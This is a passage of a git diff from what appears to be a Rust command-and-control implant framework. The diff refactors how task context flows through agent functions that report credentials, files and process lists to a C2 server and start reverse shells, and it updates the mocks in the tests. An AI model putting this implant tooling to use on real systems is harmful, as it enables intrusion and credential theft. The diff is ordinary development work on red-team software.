c2::ClaimTasksRequest) -> Result { @@ -131,11 +129,12 @@ fn test_report_process_list_integration() { task_id: 123, jwt: "test_jwt".to_string(), }; + let context = Context::Task(task_context); let backend = Arc::new(EmptyAssets {}); - let mut interp = Interpreter::new().with_default_libs().with_task_context( + let mut interp = Interpreter::new().with_default_libs().with_context( agent, - task_context, + context, Vec::new(), backend, ); diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/agent.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/agent.rs index ce08e6260..fc36b4ccc 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/agent.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/agent.rs @@ -1,2 +1,2 @@ #[cfg(feature = "stdlib")] -pub use eldritch_agent::Agent; +pub use eldritch_agent::{Agent, Context}; diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/fake.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/fake.rs index 7c003eb36..448341442 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/fake.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/fake.rs @@ -78,6 +78,8 @@ impl AgentLibrary for AgentLibraryFake { #[cfg(feature = "stdlib")] use super::agent::Agent; #[cfg(feature = "stdlib")] +use eldritch_agent::Context; +#[cfg(feature = "stdlib")] use pb::c2; #[cfg(feature = "stdlib")] @@ -106,23 +108,19 @@ impl Agent for AgentFake { ) -> Result { Ok(c2::ReportProcessListResponse::default()) } - fn report_task_output( + fn report_output( &self, - _req: c2::ReportTaskOutputRequest, - ) -> Result { - Ok(c2::ReportTaskOutputResponse::default()) + _req: c2::ReportOutputRequest, + ) -> Result { + Ok(c2::ReportOutputResponse::default()) } - fn create_portal(&self, _task_context: pb::c2::TaskContext) -> Result<(), String> { + fn create_portal(&self, _context: Context) -> Result<(), String> { Ok(()) } - fn start_reverse_shell( - &self, - _task_context: pb::c2::TaskContext, - _cmd: Option, - ) -> Result<(), String> { + fn start_reverse_shell(&self, _context: Context, _cmd: Option) -> Result<(), String> { Ok(()) } - fn start_repl_reverse_shell(&self, _task_context: pb::c2::TaskContext) -> Result<(), String> { + fn start_repl_reverse_shell(&self, _context: Context) -> Result<(), String> { Ok(()) } fn claim_tasks(&self, _req: c2::ClaimTasksRequest) -> Result { diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/fetch_asset_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/fetch_asset_impl.rs index 8b41099ae..19159aeb1 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/fetch_asset_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/fetch_asset_impl.rs @@ -2,7 +2,8 @@ use alloc::string::String; use alloc::sync::Arc; use alloc::vec::Vec; -use super::TaskContext; +use eldritch_agent::Context; +use pb::c2::fetch_asset_request; #[cfg(feature = "stdlib")] use crate::agent::Agent; @@ -11,12 +12,17 @@ use pb::c2; pub fn fetch_asset( agent: Arc, - task_context: TaskContext, + context: Context, name: String, ) -> Result, String> { + let context_val = match context { + Context::Task(tc) => Some(fetch_asset_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => Some(fetch_asset_request::Context::ShellTaskContext(stc)), + }; + let req = c2::FetchAssetRequest { name, - context: Some(task_context), + context: context_val, }; agent.fetch_asset(req) } diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/mod.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/mod.rs index a6f9a059d..ae8824f4d 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/mod.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/mod.rs @@ -3,9 +3,9 @@ use alloc::collections::BTreeMap; use alloc::string::String; use alloc::sync::Arc; use alloc::vec::Vec; +use eldritch_agent::Context; use eldritch_core::Value; use eldritch_macros::eldritch_library_impl; -use pb::c2::TaskContext; use crate::{CredentialWrapper, FileWrapper, ProcessListWrapper, TaskWrapper}; @@ -32,23 +32,20 @@ pub mod terminate_impl; #[eldritch_library_impl(AgentLibrary)] pub struct StdAgentLibrary { pub agent: Arc, - pub task_context: TaskContext, + pub context: Context, } impl core::fmt::Debug for StdAgentLibrary { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { f.debug_struct("StdAgentLibrary") - .field("task_context", &self.task_context) + .field("context", &self.context) .finish() } } impl StdAgentLibrary { - pub fn new(agent: Arc, task_context: TaskContext) -> Self { - Self { - agent, - task_context, - } + pub fn new(agent: Arc, context: Context) -> Self { + Self { agent, context } } } @@ -67,25 +64,25 @@ impl AgentLibrary for StdAgentLibrary { // Interactivity fn fetch_asset(&self, name: String) -> Result, String> { - fetch_asset_impl::fetch_asset(self.agent.clone(), self.task_context.clone(), name) + fetch_asset_impl::fetch_asset(self.agent.clone(), self.context.clone(), name) } fn report_credential(&self, credential: CredentialWrapper) -> Result<(), String> { report_credential_impl::report_credential( self.agent.clone(), - self.task_context.clone(), + self.context.clone(), credential, ) } fn report_file(&self, file: FileWrapper) -> Result<(), String> { - report_file_impl::report_file(self.agent.clone(), self.task_context.clone(), file) + report_file_impl::report_file(self.agent.clone(), self.context.clone(), file) } fn report_process_list(&self, list: ProcessListWrapper) -> Result<(), String> { report_process_list_impl::report_process_list( self.agent.clone(), - self.task_context.clone(), + self.context.clone(), list, ) } @@ -93,7 +90,7 @@ impl AgentLibrary for StdAgentLibrary { fn report_task_output(&self, output: String, error: Option) -> Result<(), String> { report_task_output_impl::report_task_output( self.agent.clone(), - self.task_context.clone(), + self.context.clone(), output, error, ) diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_credential_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_credential_impl.rs index 8a72d3e6e..0d1d2402e 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_credential_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_credential_impl.rs @@ -2,7 +2,8 @@ use alloc::string::String; use alloc::sync::Arc; use crate::CredentialWrapper; -use pb::c2::TaskContext; +use eldritch_agent::Context; +use pb::c2::report_credential_request; #[cfg(feature = "stdlib")] use crate::agent::Agent; @@ -11,11 +12,16 @@ use pb::c2; pub fn report_credential( agent: Arc, - task_context: TaskContext, + context: Context, credential: CredentialWrapper, ) -> Result<(), String> { + let context_val = match context { + Context::Task(tc) => Some(report_credential_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => Some(report_credential_request::Context::ShellTaskContext(stc)), + }; + let req = c2::ReportCredentialRequest { - context: Some(task_context.into()), + context: context_val, credential: Some(credential.0), }; agent.report_credential(req).map(|_| ()) diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_file_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_file_impl.rs index 3aaf59a14..72a2402f8 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_file_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_file_impl.rs @@ -2,7 +2,8 @@ use alloc::string::String; use alloc::sync::Arc; use crate::FileWrapper; -use pb::c2::TaskContext; +use eldritch_agent::Context; +use pb::c2::report_file_request; #[cfg(feature = "stdlib")] use crate::agent::Agent; @@ -11,12 +12,18 @@ use pb::c2; pub fn report_file( agent: Arc, - task_context: TaskContext, + context: Context, file: FileWrapper, ) -> Result<(), String> { + let context_val = match context { + Context::Task(tc) => Some(report_file_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => Some(report_file_request::Context::ShellTaskContext(stc)), + }; + let req = c2::ReportFileRequest { - context: Some(task_context.into()), + context: context_val, chunk: Some(file.0), + kind: c2::ReportFileKind::Ondisk as i32, }; agent.report_file(req).map(|_| ()) } diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_process_list_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_process_list_impl.rs index b92085972..3882cb73d 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_process_list_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_process_list_impl.rs @@ -2,7 +2,8 @@ use alloc::string::String; use alloc::sync::Arc; use crate::ProcessListWrapper; -use pb::c2::TaskContext; +use eldritch_agent::Context; +use pb::c2::report_process_list_request; #[cfg(feature = "stdlib")] use crate::agent::Agent; @@ -11,11 +12,18 @@ use pb::c2; pub fn report_process_list( agent: Arc, - task_context: TaskContext, + context: Context, list: ProcessListWrapper, ) -> Result<(), String> { + let context_val = match context { + Context::Task(tc) => Some(report_process_list_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => { + Some(report_process_list_request::Context::ShellTaskContext(stc)) + } + }; + let req = c2::ReportProcessListRequest { - context: Some(task_context.into()), + context: context_val, list: Some(list.0), }; agent.report_process_list(req).map(|_| ()) diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_task_output_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_task_output_impl.rs index 756fb6b10..e51ab6617 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_task_output_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/std/report_task_output_impl.rs @@ -1,30 +1,57 @@ use alloc::string::String; use alloc::sync::Arc; -use pb::c2::TaskContext; +use eldritch_agent::{Agent, Context}; +use pb::c2::{ + ReportShellTaskOutputMessage, ReportTaskOutputMessage, ShellTaskOutput, TaskError, TaskOutput, + report_output_request, +}; -#[cfg(feature = "stdlib")] -use crate::agent::Agent; #[cfg(feature = "stdlib")] use pb::c2; pub fn report_task_output( agent: Arc, - task_context: TaskContext, + context: Context, output: String, error: Option, ) -> Result<(), String> { - let task_error = error.map(|msg| c2::TaskError { msg }); - let output_msg = c2::TaskOutput { - id: task_context.task_id, - output, - error: task_error, - exec_started_at: None, - exec_finished_at: None, + let task_error = error.map(|msg| TaskError { msg }); + + let message_val = match context { + Context::Task(tc) => { + let output_msg = TaskOutput { + id: tc.task_id, + output, + error: task_error, + exec_started_at: None, + exec_finished_at: None, + }; + Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(tc), + output: Some(output_msg), + }, + )) + } + Context::ShellTask(stc) => { + let output_msg = ShellTaskOutput { + id: stc.shell_task_id, + output, + error: task_error, + exec_started_at: None, + exec_finished_at: None, + }; + Some(report_output_request::Message::ShellTaskOutput( + ReportShellTaskOutputMessage { + context: Some(stc), + output: Some(output_msg), + }, + )) + } }; - let req = c2::ReportTaskOutputRequest { - output: Some(output_msg), - context: Some(task_context.into()), - shell_task_output: None, + + let req = c2::ReportOutputRequest { + message: message_val, }; - agent.report_task_output(req).map(|_| ()) + agent.report_output(req).map(|_| ()) } diff --git a/implants/lib/eldritch/stdlib/eldritch-libagent/src/tests.rs b/implants/lib/eldritch/stdlib/eldritch-libagent/src/tests.rs index a92005fe0..0af52bb44 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libagent/src/tests.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libagent/src/tests.rs @@ -4,7 +4,6 @@ use crate::std::StdAgentLibrary; use alloc::collections::{BTreeMap, BTreeSet}; use alloc::sync::Arc; use eldritch_core::Value; -use pb::c2::TaskContext; use std::sync::RwLock; use std::thread; @@ -57,23 +56,23 @@ impl Agent for MockAgent { ) -> Result { Err("".into()) } - fn report_task_output( + fn report_output( &self, - _: pb::c2::ReportTaskOutputRequest, - ) -> Result { + _: pb::c2::ReportOutputRequest, + ) -> Result { Err("".into()) } - fn create_portal(&self, _task_context: TaskContext) -> Result<(), String> { + fn create_portal(&self, _context: eldritch_agent::Context) -> Result<(), String> { Err("".into()) } fn start_reverse_shell( &self, - _task_context: TaskContext, + _context: eldritch_agent::Context, _: Option, ) -> Result<(), String> { Err("".into()) } - fn start_repl_reverse_shell(&self, _task_context: TaskContext) -> Result<(), String> { + fn start_repl_reverse_shell(&self, _context: eldritch_agent::Context) -> Result<(), String> { Err("".into()) } fn claim_tasks( @@ -125,10 +124,10 @@ fn test_get_config() { let agent = Arc::new(MockAgent::new()); let lib = StdAgentLibrary::new( agent, - pb::c2::TaskContext { + eldritch_agent::Context::Task(pb::c2::TaskContext { task_id: 1, jwt: "testjwt".to_string(), - }, + }), ); let config = lib.get_config().unwrap(); @@ -141,10 +140,10 @@ fn test_concurrent_access() { let agent = Arc::new(MockAgent::new()); let lib = StdAgentLibrary::new( agent.clone(), - pb::c2::TaskContext { + eldritch_agent::Context::Task(pb::c2::TaskContext { task_id: 1, jwt: "testjwt".to_string(), - }, + }), ); let lib = Arc::new(lib); diff --git a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/copy_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/copy_impl.rs index 0fb4e8762..c21519993 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/copy_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/copy_impl.rs @@ -26,10 +26,10 @@ mod tests { let mut lib = StdAssetsLibrary::new(); lib.add(Arc::new(AgentAssets::new( agent, - TaskContext { + eldritch_agent::Context::Task(TaskContext { task_id: 0, jwt: String::new(), - }, + }), Vec::new(), )))?; lib.add(Arc::new(EmbeddedAssets::::new()))?; @@ -49,10 +49,10 @@ mod tests { let mut lib = StdAssetsLibrary::new(); lib.add(Arc::new(AgentAssets::new( agent, - TaskContext { + eldritch_agent::Context::Task(TaskContext { task_id: 0, jwt: String::new(), - }, + }), Vec::new(), )))?; lib.add(Arc::new(EmbeddedAssets::::new()))?; @@ -72,10 +72,10 @@ mod tests { let mut lib = StdAssetsLibrary::new(); lib.add(Arc::new(AgentAssets::new( agent, - TaskContext { + eldritch_agent::Context::Task(TaskContext { task_id: 0, jwt: String::new(), - }, + }), Vec::new(), )))?; lib.add(Arc::new(EmbeddedAssets::::new()))?; diff --git a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/list_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/list_impl.rs index b417194af..283bf9b93 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/list_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/list_impl.rs @@ -22,10 +22,10 @@ mod tests { let mut lib = StdAssetsLibrary::new(); lib.add(Arc::new(AgentAssets::new( agent, - TaskContext { + eldritch_agent::Context::Task(TaskContext { task_id: 0, jwt: String::new(), - }, + }), remote_files.clone(), )))?; lib.add(Arc::new(EmbeddedAssets::::new()))?; diff --git a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/mod.rs b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/mod.rs index cce5e94a9..0f59f33cd 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/mod.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/mod.rs @@ -1,14 +1,13 @@ use super::AssetsLibrary; use alloc::borrow::Cow; -use alloc::string::String; +use alloc::string::{String, ToString}; use alloc::sync::Arc; use alloc::vec::Vec; use anyhow::Result; use core::marker::PhantomData; -use eldritch_agent::Agent; +use eldritch_agent::{Agent, Context}; use eldritch_macros::eldritch_library_impl; use pb::c2::FetchAssetRequest; -use pb::c2::TaskContext; use rust_embed; use std::collections::HashSet; @@ -66,19 +65,15 @@ impl AssetBackend for EmbeddedAsse // An AssetBackend that gets assets from an agent pub struct AgentAssets { pub agent: Arc, - pub task_context: TaskContext, + pub context: Context, pub remote_assets: Vec, } impl AgentAssets { - pub fn new( - agent: Arc, - task_context: TaskContext, - remote_assets: Vec, - ) -> Self { + pub fn new(agent: Arc, context: Context, remote_assets: Vec) -> Self { Self { agent, - task_context, + context, remote_assets, } } @@ -87,9 +82,18 @@ impl AgentAssets { impl AssetBackend for AgentAssets { fn get(&self, name: &str) -> Result> { if self.remote_assets.iter().any(|s| s == name) { + let context_val = match &self.context { + Context::Task(tc) => Some(pb::c2::fetch_asset_request::Context::TaskContext( + tc.clone(), + )), + Context::ShellTask(stc) => Some( + pb::c2::fetch_asset_request::Context::ShellTaskContext(stc.clone()), + ), + }; + let req = FetchAssetRequest { name: name.to_string(), - context: Some(self.task_context.clone().into()), + context: context_val, }; return self.agent.fetch_asset(req).map_err(|e| anyhow::anyhow!(e)); } diff --git a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_binary_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_binary_impl.rs index 9c38996db..071a4b8cb 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_binary_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_binary_impl.rs @@ -10,7 +10,7 @@ impl StdAssetsLibrary { }; // Iterate through the boxed trait objects (maintaining precedence order) for backend in &self.backends { - if let Ok(file) = backend.get(&name) { + if let Ok(file) = backend.get(name) { // Return immediately upon the first match return Ok(file); } @@ -95,20 +95,23 @@ pub mod tests { ) -> Result { Ok(c2::ReportProcessListResponse::default()) } - fn report_task_output( + fn report_output( &self, - _req: c2::ReportTaskOutputRequest, - ) -> Result { - Ok(c2::ReportTaskOutputResponse::default()) + _req: c2::ReportOutputRequest, + ) -> Result { + Ok(c2::ReportOutputResponse::default()) } fn start_reverse_shell( &self, - _task_context: TaskContext, + _context: eldritch_agent::Context, _cmd: Option, ) -> Result<(), String> { Ok(()) } - fn start_repl_reverse_shell(&self, _task_context: TaskContext) -> Result<(), String> { + fn start_repl_reverse_shell( + &self, + _context: eldritch_agent::Context, + ) -> Result<(), String> { Ok(()) } fn claim_tasks( @@ -162,7 +165,10 @@ pub mod tests { Ok(()) } - fn create_portal(&self, _task_context: TaskContext) -> std::result::Result<(), String> { + fn create_portal( + &self, + __context: eldritch_agent::Context, + ) -> std::result::Result<(), String> { Ok(()) } } @@ -196,10 +202,10 @@ pub mod tests { let mut lib = StdAssetsLibrary::new(); lib.add(Arc::new(AgentAssets::new( agent, - TaskContext { + eldritch_agent::Context::Task(TaskContext { task_id: 0, jwt: String::new(), - }, + }), vec!["remote_file.txt".to_string()], )))?; let content = lib.read_binary("remote_file.txt".to_string()); @@ -214,10 +220,10 @@ pub mod tests { let mut lib = StdAssetsLibrary::new(); lib.add(Arc::new(AgentAssets::new( agent, - TaskContext { + eldritch_agent::Context::Task(TaskContext { task_id: 0, jwt: String::new(), - }, + }), vec!["remote_file.txt".to_string()], )))?; let result = lib.read_binary("remote_file.txt".to_string()); diff --git a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_impl.rs index 1593a4a01..55aaa065e 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libassets/src/std/read_impl.rs @@ -13,7 +13,6 @@ mod tests { use super::*; use crate::std::read_binary_impl::tests::{MockAgent, TestAsset}; use crate::std::{AgentAssets, AssetsLibrary, EmbeddedAssets}; - use pb::c2::TaskContext; use std::sync::Arc; #[test] @@ -22,10 +21,10 @@ mod tests { let mut lib = StdAssetsLibrary::new(); lib.add(Arc::new(AgentAssets::new( agent, - TaskContext { + eldritch_agent::Context::Task(pb::c2::TaskContext { task_id: 0, jwt: String::new(), - }, + }), vec!["remote_file.txt".to_string()], )))?; lib.add(Arc::new(EmbeddedAssets::::new()))?; diff --git a/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/mod.rs b/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/mod.rs index 218a1fbd0..4402565f6 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/mod.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/mod.rs @@ -22,29 +22,28 @@ use russh_sftp::client::SftpSession; use std::sync::Arc; // Deps for Agent -use eldritch_agent::Agent; -use pb::c2::TaskContext; +use eldritch_agent::{Agent, Context}; #[derive(Default)] #[eldritch_library_impl(PivotLibrary)] pub struct StdPivotLibrary { pub agent: Option>, - pub task_context: Option, + pub context: Option, } impl core::fmt::Debug for StdPivotLibrary { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { f.debug_struct("StdPivotLibrary") - .field("task_id", &self.task_context.as_ref().map(|tc| tc.task_id)) + .field("context", &self.context) .finish() } } impl StdPivotLibrary { - pub fn new(agent: Arc, task_context: TaskContext) -> Self { + pub fn new(agent: Arc, context: Context) -> Self { Self { agent: Some(agent), - task_context: Some(task_context), + context: Some(context), } } } @@ -55,11 +54,11 @@ impl PivotLibrary for StdPivotLibrary { .agent .as_ref() .ok_or_else(|| "No agent available".to_string())?; - let task_context = self - .task_context + let context = self + .context .clone() - .ok_or_else(|| "No task context available".to_string())?; - reverse_shell_pty_impl::reverse_shell_pty(agent.clone(), task_context, cmd) + .ok_or_else(|| "No context available".to_string())?; + reverse_shell_pty_impl::reverse_shell_pty(agent.clone(), context, cmd) .map_err(|e| e.to_string()) } @@ -68,12 +67,12 @@ impl PivotLibrary for StdPivotLibrary { .agent .as_ref() .ok_or_else(|| "No agent available".to_string())?; - let task_context = self - .task_context + let context = self + .context .clone() - .ok_or_else(|| "No task context available".to_string())?; + .ok_or_else(|| "No context available".to_string())?; agent - .start_repl_reverse_shell(task_context) + .start_repl_reverse_shell(context) .map_err(|e| e.to_string()) } @@ -82,11 +81,11 @@ impl PivotLibrary for StdPivotLibrary { .agent .as_ref() .ok_or_else(|| "No agent available".to_string())?; - let task_context = self - .task_context + let context = self + .context .clone() - .ok_or_else(|| "No task context available".to_string())?; - agent.create_portal(task_context).map_err(|e| e.to_string()) + .ok_or_else(|| "No context available".to_string())?; + agent.create_portal(context).map_err(|e| e.to_string()) } fn ssh_exec( diff --git a/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/reverse_shell_pty_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/reverse_shell_pty_impl.rs index 944357768..22eb3f582 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/reverse_shell_pty_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libpivot/src/std/reverse_shell_pty_impl.rs @@ -1,15 +1,14 @@ use alloc::string::String; use alloc::sync::Arc; use anyhow::Result; -use eldritch_agent::Agent; -use pb::c2::TaskContext; +use eldritch_agent::{Agent, Context}; pub fn reverse_shell_pty( agent: Arc, - task_context: TaskContext, + context: Context, cmd: Option, ) -> Result<()> { agent - .start_reverse_shell(task_context, cmd) + .start_reverse_shell(context, cmd) .map_err(|e| anyhow::anyhow!(e)) } diff --git a/implants/lib/eldritch/stdlib/eldritch-libpivot/src/tests.rs b/implants/lib/eldritch/stdlib/eldritch-libpivot/src/tests.rs index 8d0d6ae84..d77b58ac1 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libpivot/src/tests.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libpivot/src/tests.rs @@ -40,21 +40,24 @@ impl Agent for MockAgent { ) -> Result { Ok(c2::ReportProcessListResponse {}) } - fn report_task_output( + fn report_output( &self, - _req: c2::ReportTaskOutputRequest, - ) -> Result { - Ok(c2::ReportTaskOutputResponse {}) + _req: c2::ReportOutputRequest, + ) -> Result { + Ok(c2::ReportOutputResponse {}) } fn start_reverse_shell( &self, - task_context: pb::c2::TaskContext, + context: eldritch_agent::Context, cmd: Option, ) -> Result<(), String> { - self.start_calls - .lock() - .unwrap() - .push((task_context.task_id, cmd)); + self.start_calls.lock().unwrap().push(( + match context { + eldritch_agent::Context::Task(t) => t.task_id, + eldritch_agent::Context::ShellTask(s) => s.shell_task_id, + }, + cmd, + )); Ok(()) } fn claim_tasks(&self, _req: c2::ClaimTasksRequest) -> Result { @@ -88,8 +91,11 @@ impl Agent for MockAgent { fn stop_task(&self, _task_id: i64) -> Result<(), String> { Ok(()) } - fn start_repl_reverse_shell(&self, task_context: pb::c2::TaskContext) -> Result<(), String> { - self.repl_calls.lock().unwrap().push(task_context.task_id); + fn start_repl_reverse_shell(&self, context: eldritch_agent::Context) -> Result<(), String> { + self.repl_calls.lock().unwrap().push(match context { + eldritch_agent::Context::Task(t) => t.task_id, + eldritch_agent::Context::ShellTask(s) => s.shell_task_id, + }); Ok(()) } fn set_callback_uri(&self, _uri: String) -> std::result::Result<(), String> { @@ -111,7 +117,7 @@ impl Agent for MockAgent { Ok(()) } - fn create_portal(&self, _task_context: pb::c2::TaskContext) -> Result<(), String> { + fn create_portal(&self, _task_context: eldritch_agent::Context) -> Result<(), String> { Ok(()) } } @@ -120,7 +126,7 @@ impl Agent for MockAgent { fn test_reverse_shell_pty_delegation() { let agent = Arc::new(MockAgent::new()); let task_id = 999; - let lib = StdPivotLibrary::new(agent.clone(), pb::c2::TaskContext{ task_id, jwt: "eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJiZWFjb25faWQiOjQyOTQ5Njc0OTUsImV4cCI6MTc2Nzc1MTI3MSwiaWF0IjoxNzY3NzQ3NjcxfQ.wVFQemOmhdjCSGdb_ap_DkA9GcGqDHt3UOn2w9fE0nc7nGLbAWqQkkOwuMqlsC9FXZoYglOz11eTUt9UyrmiBQ".to_string()}); + let lib = StdPivotLibrary::new(agent.clone(), eldritch_agent::Context::Task(pb::c2::TaskContext{ task_id, jwt: "eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJiZWFjb25faWQiOjQyOTQ5Njc0OTUsImV4cCI6MTc2Nzc1MTI3MSwiaWF0IjoxNzY3NzQ3NjcxfQ.wVFQemOmhdjCSGdb_ap_DkA9GcGqDHt3UOn2w9fE0nc7nGLbAWqQkkOwuMqlsC9FXZoYglOz11eTUt9UyrmiBQ".to_string()})); // Test with command lib.reverse_shell_pty(Some("bash".to_string())).unwrap(); @@ -143,7 +149,7 @@ fn test_reverse_shell_pty_no_agent() { fn test_reverse_shell_repl_delegation() { let agent = Arc::new(MockAgent::new()); let task_id = 123; - let lib = StdPivotLibrary::new(agent.clone(), pb::c2::TaskContext{ task_id, jwt: "eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJiZWFjb25faWQiOjQyOTQ5Njc0OTUsImV4cCI6MTc2Nzc1MTI3MSwiaWF0IjoxNzY3NzQ3NjcxfQ.wVFQemOmhdjCSGdb_ap_DkA9GcGqDHt3UOn2w9fE0nc7nGLbAWqQkkOwuMqlsC9FXZoYglOz11eTUt9UyrmiBQ".to_string()}); + let lib = StdPivotLibrary::new(agent.clone(), eldritch_agent::Context::Task(pb::c2::TaskContext{ task_id, jwt: "eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJiZWFjb25faWQiOjQyOTQ5Njc0OTUsImV4cCI6MTc2Nzc1MTI3MSwiaWF0IjoxNzY3NzQ3NjcxfQ.wVFQemOmhdjCSGdb_ap_DkA9GcGqDHt3UOn2w9fE0nc7nGLbAWqQkkOwuMqlsC9FXZoYglOz11eTUt9UyrmiBQ".to_string()})); lib.reverse_shell_repl().unwrap(); diff --git a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/file_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/file_impl.rs index d7fe45a4f..e70051c1e 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/file_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/file_impl.rs @@ -1,10 +1,10 @@ use alloc::string::String; use alloc::sync::Arc; -use eldritch_agent::Agent; -use pb::c2::TaskContext; +use eldritch_agent::{Agent, Context}; +use pb::c2::report_file_request; use pb::{c2, eldritch}; -pub fn file(agent: Arc, task_context: TaskContext, path: String) -> Result<(), String> { +pub fn file(agent: Arc, context: Context, path: String) -> Result<(), String> { let content = std::fs::read(&path).map_err(|e| e.to_string())?; let metadata = eldritch::FileMetadata { @@ -16,10 +16,15 @@ pub fn file(agent: Arc, task_context: TaskContext, path: String) -> R chunk: content, }; - println!("reporting file chunk with JWT: {}", task_context.jwt); + let context_val = match context { + Context::Task(tc) => Some(report_file_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => Some(report_file_request::Context::ShellTaskContext(stc)), + }; + let req = c2::ReportFileRequest { - context: Some(task_context), + context: context_val, chunk: Some(file_msg), + kind: c2::ReportFileKind::Ondisk as i32, }; agent.report_file(req).map(|_| ()) diff --git a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/mod.rs b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/mod.rs index 42cab2e93..a9840c81b 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/mod.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/mod.rs @@ -3,10 +3,9 @@ use alloc::collections::BTreeMap; use alloc::string::String; use alloc::sync::Arc; use alloc::vec::Vec; -use eldritch_agent::Agent; +use eldritch_agent::{Agent, Context}; use eldritch_core::Value; use eldritch_macros::eldritch_library_impl; -use pb::c2::TaskContext; pub mod file_impl; pub mod ntlm_hash_impl; @@ -17,54 +16,46 @@ pub mod user_password_impl; #[eldritch_library_impl(ReportLibrary)] pub struct StdReportLibrary { pub agent: Arc, - pub task_context: TaskContext, + pub context: Context, } impl core::fmt::Debug for StdReportLibrary { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { f.debug_struct("StdReportLibrary") - .field("task_id", &self.task_context.task_id) + .field("context", &self.context) .finish() } } impl StdReportLibrary { - pub fn new(agent: Arc, task_context: TaskContext) -> Self { - Self { - agent, - task_context, - } + pub fn new(agent: Arc, context: Context) -> Self { + Self { agent, context } } } impl ReportLibrary for StdReportLibrary { fn file(&self, path: 